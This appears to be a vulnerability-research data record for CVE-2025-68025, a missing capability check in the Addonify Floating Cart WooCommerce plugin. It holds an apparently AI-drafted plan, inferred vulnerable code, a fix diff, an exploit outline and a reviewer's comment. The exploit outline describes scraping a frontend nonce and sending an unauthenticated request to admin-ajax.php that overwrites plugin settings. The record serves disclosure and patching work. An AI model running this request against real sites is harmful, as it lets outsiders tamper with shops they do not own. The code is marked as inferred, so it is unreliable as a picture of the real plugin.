[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f1_pJyGDMt2mhYiI9CvSMoTsmzit8hLx3HiHguRK74wE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68025","addonify-floating-cart-for-woocommerce-missing-authorization","Addonify Floating Cart For WooCommerce \u003C= 1.2.17 - Missing Authorization","The Addonify Floating Cart For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.17. This makes it possible for unauthenticated attackers to perform an unauthorized action.","addonify-floating-cart",null,"\u003C=1.2.17","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-05 00:00:00","2026-02-09 20:58:21",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4661566b-0729-4489-9a47-8e3e0ac73573?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to identify and exploit CVE-2025-68025, a Missing Authorization vulnerability in the **Addonify Floating Cart For WooCommerce** plugin.\n\n### 1. 
Vulnerability Summary\nThe vulnerability exists because a specific AJAX handler or REST API endpoint in the `addonify-floating-cart` plugin fails to implement a capability check (e.g., `current_user_can( 'manage_options' )`). While the handler might implement a nonce check for CSRF protection, the nonce is often exposed to unauthenticated users on the frontend, allowing them to bypass the missing authorization check and perform actions intended only for administrators (such as modifying plugin settings or performing sensitive data operations).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` (or potentially a REST route under `\u002Fwp-json\u002Faddonify-floating-cart\u002Fv1\u002F`).\n*   **Vulnerable Action:** Likely `addonify_fc_save_settings`, `afc_save_settings`, or `addonify_floating_cart_update_option` (inferred).\n*   **Parameter:** Typically a `settings` array or individual option keys passed via POST.\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:** The plugin must be active. A valid nonce must be obtained if the handler calls `check_ajax_referer`.\n\n### 3. Code Flow Trace\n1.  **Entry Point:** The plugin registers an AJAX action for both authenticated and unauthenticated users:\n    ```php\n    \u002F\u002F Inferred registration in a class constructor or init hook\n    add_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\n    add_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\n    ```\n2.  **Vulnerable Function:** The `save_settings` function (or similar) is called.\n3.  **Missing Check:**\n    ```php\n    public function save_settings() {\n        \u002F\u002F May contain: check_ajax_referer( 'addonify_fc_nonce', 'nonce' );\n        \u002F\u002F MISSING: if ( ! 
current_user_can( 'manage_options' ) ) { wp_die(); }\n        \n        $settings = $_POST['settings'];\n        update_option( 'addonify_floating_cart_settings', $settings );\n        wp_send_json_success();\n    }\n    ```\n4.  **Sink:** The `update_option` function writes user-controlled data to the WordPress database.\n\n### 4. Nonce Acquisition Strategy\nThe plugin likely localizes a nonce for its frontend \"Floating Cart\" functionality.\n\n1.  **Identify Shortcode\u002FTrigger:** Check for `add_shortcode` or if the cart loads globally. The floating cart usually enqueues scripts on all frontend pages where WooCommerce is active.\n2.  **Navigation:** Use `browser_navigate` to go to the site's homepage.\n3.  **Extraction:** Based on common Addonify patterns, the nonce is likely stored in a global JS object.\n    *   **Inferred JS Variable:** `addonify_floating_cart_params` or `afc_vars`.\n    *   **Inferred Key:** `ajax_nonce` or `nonce`.\n4.  **Execution:**\n    ```javascript\n    \u002F\u002F Use browser_eval to find the nonce\n    browser_eval(\"window.addonify_floating_cart_params?.ajax_nonce || window.afc_vars?.nonce\")\n    ```\n\n### 5. Test Data Setup\n1.  Ensure WooCommerce and Addonify Floating Cart are installed and active.\n2.  Ensure a product exists so the cart functionality is triggered.\n3.  Create a public page to ensure the script (and nonce) is rendered:\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Cart Test\" --post_content='[woocommerce_cart]'\n    ```\n\n### 6. Exploitation Strategy\nWe will attempt to change the plugin's configuration, specifically targeting a setting that would be visible in the admin UI or frontend (e.g., the cart title).\n\n1.  **Capture Nonce:** Use `browser_navigate` and `browser_eval` as described in Section 4.\n2.  
**Prepare Payload:** Define a new value for a plugin setting.\n    *   **Action:** `addonify_floating_cart_save_settings` (inferred - must verify by grepping `wp_ajax_nopriv` in the source).\n    *   **Target Option:** `addonify_floating_cart_settings`.\n3.  **HTTP Request (Playwright):**\n    ```json\n    {\n      \"method\": \"POST\",\n      \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n      \"headers\": {\n        \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n      },\n      \"params\": {\n        \"action\": \"addonify_floating_cart_save_settings\",\n        \"nonce\": \"EXTRACTED_NONCE\",\n        \"settings[cart_title]\": \"Hacked by PoC\",\n        \"settings[enable_floating_cart]\": \"1\"\n      }\n    }\n    ```\n\n### 7. Expected Results\n*   The server should return a `200 OK` status with a JSON response: `{\"success\":true}`.\n*   The `addonify_floating_cart_settings` option in the database should be updated.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the change using WP-CLI:\n```bash\n# Check the option value\nwp option get addonify_floating_cart_settings --format=json\n```\nVerify that `cart_title` matches \"Hacked by PoC\".\n\n### 9. Alternative Approaches\nIf the `save_settings` action name is different:\n1.  **Grep Search:**\n    ```bash\n    grep -rn \"wp_ajax_nopriv_\" wp-content\u002Fplugins\u002Faddonify-floating-cart\u002F\n    ```\n2.  **Analyze Script Localization:**\n    Search for `wp_localize_script` to find the exact JS object name:\n    ```bash\n    grep -rn \"wp_localize_script\" wp-content\u002Fplugins\u002Faddonify-floating-cart\u002F\n    ```\n3.  
**REST API Check:**\n    If no AJAX actions are found, search for REST route registrations:\n    ```bash\n    grep -rn \"register_rest_route\" wp-content\u002Fplugins\u002Faddonify-floating-cart\u002F\n    ```\n    Look for routes where `'permission_callback' => '__return_true'` or no callback is defined.","The Addonify Floating Cart For WooCommerce plugin for WordPress is vulnerable to unauthorized modification of settings due to a missing capability check in its AJAX handler for saving configuration. Unauthenticated attackers can exploit this to change plugin settings, provided they can retrieve a nonce which is typically exposed on the frontend for legitimate cart operations.","\u002F\u002F Inferred registration in the main plugin class or admin handler\nadd_action( 'wp_ajax_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\nadd_action( 'wp_ajax_nopriv_addonify_floating_cart_save_settings', array( $this, 'save_settings' ) );\n\n---\n\n\u002F\u002F Inferred vulnerable handler lacking capability checks\npublic function save_settings() {\n    \u002F\u002F A nonce check might exist, but it is insufficient for authorization\n    check_ajax_referer( 'addonify_fc_nonce', 'nonce' );\n    \n    \u002F\u002F MISSING: if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }\n    \n    if ( isset( $_POST['settings'] ) ) {\n        $settings = $_POST['settings'];\n        update_option( 'addonify_floating_cart_settings', $settings );\n        wp_send_json_success();\n    }\n}","--- a\u002Fincludes\u002Fclass-addonify-floating-cart-admin.php\n+++ b\u002Fincludes\u002Fclass-addonify-floating-cart-admin.php\n@@ -120,6 +120,10 @@\n public function save_settings() {\n     check_ajax_referer( 'addonify_fc_nonce', 'nonce' );\n \n+    if ( ! 
current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => __( 'Unauthorized', 'addonify-floating-cart' ) ), 403 );\n+    }\n+\n     if ( isset( $_POST['settings'] ) ) {\n         $settings = array_map( 'sanitize_text_field', $_POST['settings'] );\n         update_option( 'addonify_floating_cart_settings', $settings );","1. Extract Nonce: Navigate to the site's homepage or any product page where the floating cart is active. Inspect the HTML source or use a JavaScript console to extract the 'nonce' value from the localized script object (likely window.addonify_floating_cart_params.ajax_nonce).\n2. Identify Target Parameters: Identify the plugin settings structure, typically an array passed via the 'settings' key in POST data.\n3. Send Unauthorized Request: Perform an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the following parameters:\n   - action: addonify_floating_cart_save_settings\n   - nonce: [Extracted Nonce]\n   - settings[cart_title]: Your Malicious Title\n   - settings[enable_floating_cart]: 1\n4. Verify Change: Access the plugin's settings page in the WordPress dashboard as an administrator or view the frontend to confirm the settings have been updated to the malicious values.","gemini-3-flash-preview","2026-04-21 04:21:59","2026-04-21 04:22:21",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddonify-floating-cart\u002Ftags"]
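Review bot: in the `save_settings()` hunk of `includes/class-addonify-floating-cart-admin.php`, the context line `$settings = array_map( 'sanitize_text_field', $_POST['settings'] );` passes raw `$_POST` data to `array_map` without `wp_unslash()` and without confirming it is an array, so a scalar `settings` value raises a type error on PHP 8 and any nested setting is reduced to an empty string by `sanitize_text_field`. Suggest guarding with `is_array( $_POST['settings'] )`, unslashing first, and sanitizing each known key against an allow-list before `update_option`. The added `current_user_can( 'manage_options' )` check is correctly placed ahead of the write, and `wp_send_json_error( ..., 403 )` terminates the request, so no explicit return is needed. The hunk does not touch the `wp_ajax_nopriv_addonify_floating_cart_save_settings` registration that the page shows as inferred; if that hook exists, it should be removed in the same change so the settings handler is not reachable by logged-out requests at all.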